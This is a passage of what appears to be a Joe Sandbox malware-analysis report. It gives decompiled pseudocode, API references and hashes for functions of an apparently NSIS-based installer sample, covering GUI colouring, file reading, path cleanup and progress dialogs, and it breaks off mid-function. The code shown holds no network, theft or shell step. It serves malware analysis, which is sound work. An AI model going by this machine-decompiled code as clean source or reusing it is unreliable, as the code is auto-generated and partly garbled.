Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: ('B
API String ID: 1495540970-2332581011
Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68

Uniqueness

Uniqueness Score: -1.00%

Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x0040463d
0x004046f3
0x00000000
0x004046f3
0x0040464e
0x00404652
0x00000000
0x0040466c
0x0040466c
0x00404675
0x00000000
0x00000000
0x00404677
0x00404683
0x00404686
0x00404686
0x0040468c
0x00404692
0x00404692
0x0040469e
0x004046a4
0x004046ab
0x004046ae
0x004046b1
0x004046b3
0x004046b3
0x004046bb
0x004046c1
0x004046c1
0x004046cb
0x004046d0
0x004046d3
0x004046d8
0x004046db
0x004046db
0x004046eb
0x004046eb
0x00000000
0x004046ee

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404648
GetSysColor.USER32(00000000), ref: 00404686
SetTextColor.GDI32(?,00000000), ref: 00404692
SetBkMode.GDI32(?,?), ref: 0040469E
GetSysColor.USER32(?), ref: 004046B1
SetBkColor.GDI32(?,?), ref: 004046C1
DeleteObject.GDI32(?), ref: 004046DB
CreateBrushIndirect.GDI32(?), ref: 004046E5

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004026ec
0x004026ee
0x004026f1
0x004026f3
0x004026f6
0x004026fb
0x004026ff
0x00402702
0x00402705
0x00402c2a
0x00402c2d
0x0040270b
0x0040270b
0x00402712
0x00402714
0x00402714
0x0040271a
0x0040287e
0x0040287e
0x00402881
0x00402886
0x004015b6
0x0040292e
0x0040292e
0x00000000
0x00402720
0x00402721
0x0040272c
0x0040272f
0x0040273b
0x0040273f
0x004027d7
0x004027ef
0x004027ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402745
0x00402745
0x00402748
0x00402749
0x0040274c
0x00402751
0x00402758
0x00402760
0x00000000
0x00402766
0x00402766
0x0040276b
0x00000000
0x00402771
0x00402771
0x00402779
0x0040277c
0x0040277f
0x0040283a
0x00402841
0x00402785
0x0040278b
0x00402797
0x00402801
0x00402801
0x00402799
0x00402799
0x0040279c
0x0040279e
0x0040279e
0x0040279e
0x004027a1
0x004027a6
0x004027a9
0x00000000
0x00000000
0x004027ab
0x004027ae
0x004027bc
0x004027c2
0x004027d0
0x00000000
0x004027d2
0x00000000
0x004027d2
0x00000000
0x004027d0
0x0040279e
0x00402804
0x00402807
0x00000000
0x00402809
0x0040280e
0x0040284f
0x00402871
0x00402878
0x0040285d
0x0040285d
0x00402860
0x00402863
0x00402866
0x00402866
0x00000000
0x00402817
0x00402817
0x0040281a
0x0040281d
0x00402823
0x00402827
0x0040282a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040282a
0x0040280e
0x00402807
0x0040277f
0x0040276b
0x00402760
0x00000000
0x0040282c
0x0040282c
0x0040282f
0x00402838
0x00000000
0x0040272f
0x0040271a
0x00402c33
0x00402c39

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004068f1
0x004068fa
0x00406911
0x00406911
0x00406918
0x00406924
0x00406924
0x00406927
0x0040692a
0x0040692f
0x00406931
0x0040693a
0x0040693e
0x0040695b
0x00406963
0x00406963
0x00406968
0x0040696a
0x0040696d
0x00406972
0x00406973
0x00406977
0x00406977
0x00406978
0x0040697f
0x00406981
0x00406988
0x00000000
0x00000000
0x00406990
0x00406996
0x00000000
0x00000000
0x00000000
0x00406996
0x0040699b

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
CharNextW.USER32(?,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
CharPrevW.USER32(?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979

Strings

*?|<>/":, xrefs: 00406941
C:\Users\user\AppData\Local\Temp\, xrefs: 004068F0

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2982765560
Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				if( *0x420efc != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42a26c) {
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}

0x0040303d
0x0040303f
0x00403046
0x00403049
0x00403049
0x0040304f
0x00000000
0x0040304f
0x0040305d
0x00000000
0x00403060
0x00403067
0x00403073
0x0040307b
0x004030b9
0x004030c2
0x00000000
0x004030c7
0x00403084
0x00403095
0x00000000
0x004030a3
0x00403084
0x004030cf

APIs

DestroyWindow.USER32(?,00000000), ref: 00403049
GetTickCount.KERNEL32 ref: 00403067
wsprintfW.USER32 ref: 00403095

Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

CreateDialogParamW.USER32 ref: 004030B9
ShowWindow.USER32(00000000,00000005), ref: 004030C7

Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027

Strings

... %d%%, xrefs: 0040308F

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404f8d
0x00404f9a
0x00404fa0
0x00404fde
0x00404fde
0x00404fed
0x00404ff4
0x00000000
0x00404ff6
0x00404fa2
0x00404fb1
0x00404fb9
0x00404fbc
0x00404fce
0x00404fd4
0x00404fdb
0x00000000
0x00404fdb
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
GetMessagePos.USER32 ref: 00404FA2
ScreenToClient.USER32 ref: 00404FBC
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4

Strings

f, xrefs: 00404FD0

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402fa3
0x00402fb1
0x00402fb7
0x00402fb7
0x00402fc5
0x00402fc7
0x00402fd3
0x00402fd8
0x00402fda
0x00402fda
0x00402fe5
0x00402ff5
0x00403007
0x00403007
0x0040300f

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
wsprintfW.USER32 ref: 00402FE5
SetWindowTextW.USER32(?,?), ref: 00402FF5
SetDlgItemTextW.USER32 ref: 00403007

Strings

verifying installer: %d%%, xrefs: 00402FDA
unpacking data: %d%%, xrefs: 00402FD3, 00402FE3

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
